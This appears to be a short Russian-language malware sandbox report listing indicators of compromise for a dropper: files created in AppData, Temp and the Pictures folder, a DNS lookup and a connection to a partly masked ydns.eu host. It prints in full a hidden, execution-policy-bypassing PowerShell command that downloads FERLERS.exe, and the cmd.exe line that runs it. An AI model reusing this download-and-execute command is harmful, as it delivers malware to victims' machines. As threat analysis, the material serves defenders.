Техническая информация
- http://tr#####wweee.ydns.eu/ferlers.exe как %appdata%\ferlers.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\FERLERS.exe
- %TEMP%\abdtfhgygeghdpš.sct
- %APPDATA%\ferlers.exe
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\megohmit.buc
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\nmdllhost.exe.manifest
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\skumpelskud2.sar
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\folder-videos-symbolic.symbolic.png
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\msador28.tlb
- %ProgramFiles(x86)%\demonstrationsmodeller.ini
- %TEMP%\nsd4809.tmp\system.dll
- %TEMP%\nsy9bb4.tmp\system.dll
- %TEMP%\nsoaef6.tmp\system.dll
- %TEMP%\abdtfhgygeghdpš.sct
- 'tr#####wweee.ydns.eu':80
- http://tr#####wweee.ydns.eu/FERLERS.exe
- DNS ASK tr#####wweee.ydns.eu
- ClassName: '#32770' WindowName: ''
- '%APPDATA%\ferlers.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\FERLERS.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://tr#####wweee.ydns.eu/FERLERS.exe','%APPDATA%\FERLERS.exe')' (со скрытым окном)